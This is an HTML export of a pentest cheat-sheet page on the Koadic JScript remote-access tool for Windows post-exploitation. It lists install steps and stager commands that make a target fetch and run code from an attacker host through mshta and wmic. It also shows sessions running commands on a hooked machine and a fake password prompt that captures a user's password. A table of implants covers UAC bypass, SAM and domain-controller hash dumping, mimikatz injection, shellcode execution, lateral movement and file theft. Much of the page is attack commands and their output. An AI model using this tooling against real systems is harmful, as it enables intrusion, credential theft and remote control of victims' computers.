<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Windows - Post Exploitation Koadic</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="ed68ea43-0ef8-411f-acb5-a3b353daedff" class="page sans"><header><h1 class="page-title">Windows - Post Exploitation Koadic</h1></header><div class="page-body"><h1 id="03c5e5bd-c474-4f86-8900-8a0953da896d" class="">Koadic C3 COM Command &amp; Control - JScript RAT</h1><blockquote id="0beff33c-2e60-4773-a963-2a277fe57af2" class="">Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.</blockquote><h2 id="098d84e8-357e-46be-ba4f-c8e2220b3773" class="">Installation</h2><pre id="a5816dca-d9f3-4a6e-9b10-096575309296" class="code"><code>git clone https://github.com/zerosum0x0/koadicgit submodule initgit submodule updatepip2.7 install -r requirements.txt --userpython2.7 koadic</code></pre><h2 id="03fef793-b982-4175-bd57-665fc2147283" class="">Set a listener</h2><pre id="078ba753-df03-47c7-8846-8123b2618dfe" class="code"><code>use stager/js/mshtaset LHOST 192.168.1.19set SRVPORT 4444run[&gt;] mshta http://192.168.1.19:4444/6DX7f</code></pre><pre id="cd9aa1f3-c0cc-461c-82c1-34f1d1eca12e" class="code"><code>use stager/js/wmicset LHOST 192.168.1.19set SRVPORT 4444run[&gt;] wmic os get /FORMAT:&quot;http://192.168.1.19:4444/lQGx5.xsl&quot;</code></pre><h3 id="05217ef8-da8a-457a-b6c5-d272a732888d" class="">Stagers</h3><p id="498a84f3-b01a-43be-aea9-ce73a910a1a8" class="">Stagers hook target zombies and allow you to use implants.</p><div id="161aecd7-911e-43f0-a7ce-a2fe27670f5f" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Module</th><th>Description</th></tr></thead><tbody><tr id="5b2f7f41-009a-468b-9704-13210c4ad671"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database/stager%20js%20mshta.html">stager/js/mshta</a></td><td class="cell-;v!^">serves payloads using MSHTA.exe HTML Applications</td></tr><tr id="ba2f9389-d31b-4f34-b3ef-c2b2f9069e33"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database/stager%20js%20regsvr.html">stager/js/regsvr</a></td><td class="cell-;v!^">serves payloads using regsvr32.exe COM+ scriptlets</td></tr><tr id="03223d28-a80a-48d9-9b3b-dd3d2453c3c6"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database/stager%20js%20wmic.html">stager/js/wmic</a></td><td class="cell-;v!^">serves payloads using WMIC XSL</td></tr><tr id="fa97934e-f0af-4247-b7ca-3d9d9757b166"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database/stager%20js%20rundll32_js.html">stager/js/rundll32_js</a></td><td class="cell-;v!^">serves payloads using rundll32.exe</td></tr><tr id="55b9364b-502b-4fe8-ba91-f38243196389"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database/stager%20js%20disk.html">stager/js/disk</a></td><td class="cell-;v!^">serves payloads using files on disk</td></tr></tbody></table></div><h2 id="6cb5e694-4c24-45f9-98a4-6d6be74d5dd9" class="">List zombies and interact with them</h2><pre id="87ef8a47-9199-4f95-810b-dfbb8fda2f9d" class="code"><code>(koadic: sta/js/wmic)$ zombiesID   IP              STATUS  LAST SEEN---  ---------       ------- ------------0    192.168.1.30    Alive   2018-10-04 17:07:12(koadic: sta/js/wmic)$ zombies 0ID:                     0Status:                 AliveFirst Seen:             2018-10-04 17:05:00Last Seen:              2018-10-04 17:14:42IP:                     192.168.1.30User:                   DESKTOP-68URA9U\CrashWin[...]Elevated:               No[...]</code></pre><p id="99d34e77-ca85-4610-9738-ed0e1f63c2ac" class="">Interact with <code>zombies zombie_id</code>, get a shell with <code>cmdshell zombie_id</code>.</p><pre id="f19d63f0-a99b-4991-867c-629debef82e9" class="code"><code>[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]&gt; whoami[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.Result for `cd C:\Users\CrashWin &amp; whoami`:desktop-68ura9u\crashwin</code></pre><h2 id="c48202af-e838-4ee0-841d-7666f204b05f" class="">Use an implant</h2><p id="3cfaf774-fdcb-43f9-8f26-17748e5cc0da" class="">Select an implant with <code>use module</code>, then fill the <code>info</code> with <code>set INFO value</code>, finally start the module with <code>run</code>.</p><pre id="7d93b19e-60e8-4d5c-9bf7-67bb5c89efd2" class="code"><code>(koadic: sta/js/mshta)$ use implant/phish/password_box(koadic: imp/phi/password_box)$ set ZOMBIE 1(koadic: imp/phi/password_box)$ runInput contents:MyStrongPassword123!</code></pre><h3 id="8b63007a-d097-4d81-bb7e-110d61155313" class="">Implants</h3><p id="6d842b7c-2c21-4574-a703-9844869906e3" class="">Implants start jobs on zombies.</p><div id="6632767d-ae85-4db7-90f1-02949ab794d1" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Module</th><th>Description</th></tr></thead><tbody><tr id="1fb19127-f8bf-4648-bf5e-a99ba0666451"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20elevate%20bypassuac_eventvwr.html">implant/elevate/bypassuac_eventvwr</a></td><td class="cell-[.qE">Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.</td></tr><tr id="3fa0642e-b9e6-465a-9d59-c2b4819e65dd"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20elevate%20bypassuac_sdclt.html">implant/elevate/bypassuac_sdclt</a></td><td class="cell-[.qE">Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.</td></tr><tr id="9b571bb2-545b-4f1c-a512-89ad482c2801"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20fun%20zombie.html">implant/fun/zombie</a></td><td class="cell-[.qE">Maxes volume and opens The Cranberries YouTube in a hidden window.</td></tr><tr id="9a7eb10d-8a7f-42a6-b446-2f3fc774c616"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20fun%20voice.html">implant/fun/voice</a></td><td class="cell-[.qE">Plays a message over text-to-speech.</td></tr><tr id="9b26891e-00a5-4ba9-a715-e7f493c4c41b"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20gather%20clipboard.html">implant/gather/clipboard</a></td><td class="cell-[.qE">Retrieves the current content of the user clipboard.</td></tr><tr id="14590fca-af08-47a1-81a9-dfdf9b7bc62a"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20gather%20enum_domain_info.html">implant/gather/enum_domain_info</a></td><td class="cell-[.qE">Retrieve information about the Windows domain.</td></tr><tr id="5489f3b3-1aa8-4ee3-8d2a-429f272acf56"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20gather%20hashdump_sam.html">implant/gather/hashdump_sam</a></td><td class="cell-[.qE">Retrieves hashed passwords from the SAM hive.</td></tr><tr id="06cdb0c8-6cf6-4cc6-9353-78d48bcaca44"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20gather%20hashdump_dc.html">implant/gather/hashdump_dc</a></td><td class="cell-[.qE">Domain controller hashes from the NTDS.dit file.</td></tr><tr id="3034b880-f9cb-4e1b-b244-237fac30d984"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20gather%20user_hunter.html">implant/gather/user_hunter</a></td><td class="cell-[.qE">Locate users logged on to domain computers (using Dynamic Wrapper X).</td></tr><tr id="e02d0fbf-2c3a-464f-aec3-5d12dd743768"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20inject%20mimikatz_dynwrapx.html">implant/inject/mimikatz_dynwrapx</a></td><td class="cell-[.qE">Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).</td></tr><tr id="8a82570c-6329-45e8-9db9-77ebf40b9398"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20inject%20mimikatz_dotnet2js.html">implant/inject/mimikatz_dotnet2js</a></td><td class="cell-[.qE">Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).</td></tr><tr id="45f76017-2110-4998-8329-1a927fc0c370"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20inject%20shellcode_excel.html">implant/inject/shellcode_excel</a></td><td class="cell-[.qE">Runs arbitrary shellcode payload (if Excel is installed).</td></tr><tr id="d80de4a0-b2a0-4a2c-a040-8aadd137d793"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20manage%20enable_rdesktop.html">implant/manage/enable_rdesktop</a></td><td class="cell-[.qE">Enables remote desktop on the target.</td></tr><tr id="8242d698-d02a-4acb-ae32-726716093423"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20manage%20exec_cmd.html">implant/manage/exec_cmd</a></td><td class="cell-[.qE">Run an arbitrary command on the target, and optionally receive the output.</td></tr><tr id="35397362-9961-44f2-a7fe-4e6bcce1b0a3"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20phishing%20password_box.html">implant/phishing/password_box</a></td><td class="cell-[.qE">Prompt a user to enter their password.</td></tr><tr id="9f4e034c-10e2-4c81-8226-ebc9deffd922"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20pivot%20stage_wmi.html">implant/pivot/stage_wmi</a></td><td class="cell-[.qE">Hook a zombie on another machine using WMI.</td></tr><tr id="2049beeb-964a-4a7a-9d96-fde2eef327c2"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20pivot%20exec_psexec.html">implant/pivot/exec_psexec</a></td><td class="cell-[.qE">Run a command on another machine using psexec from sysinternals.</td></tr><tr id="2e263ed9-403d-4ab8-8682-dc9fb6c364dc"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20scan%20tcp.html">implant/scan/tcp</a></td><td class="cell-[.qE">Uses HTTP to scan open TCP ports on the target zombie LAN.</td></tr><tr id="9d73e213-946d-4832-851b-d9cf20bad791"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20utils%20download_file.html">implant/utils/download_file</a></td><td class="cell-[.qE">Downloads a file from the target zombie.</td></tr><tr id="db437815-dee5-4b15-8227-1a56a4b497ee"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20utils%20multi_module.html">implant/utils/multi_module</a></td><td class="cell-[.qE">Run a number of implants in succession.</td></tr><tr id="7a94ffdd-53cc-482c-93f2-c8d0ebbc9193"><td class="cell-title"><a href="Windows%20Post%20Exploitation%20Koadic/Untitled%20Database%201/implant%20utils%20upload_file.html">implant/utils/upload_file</a></td><td class="cell-[.qE">Uploads a file from the listening server to the target zombies.</td></tr></tbody></table></div><h2 id="dc7522eb-4889-4423-b75e-0781517743f4" class="">References</h2><ul id="472d44f0-babd-4f42-9f2e-08d7dfc76b47" class="bulleted-list"><li><a href="https://pentestlab.blog/tag/koadic/">Pentestlab - koadic</a></li></ul><ul id="929ab5fd-1919-4a0c-9abf-229e9eda35e9" class="bulleted-list"><li><a href="https://github.com/zerosum0x0/koadic">zerosum0x0 Github - koadic</a></li></ul></div></article></body></html>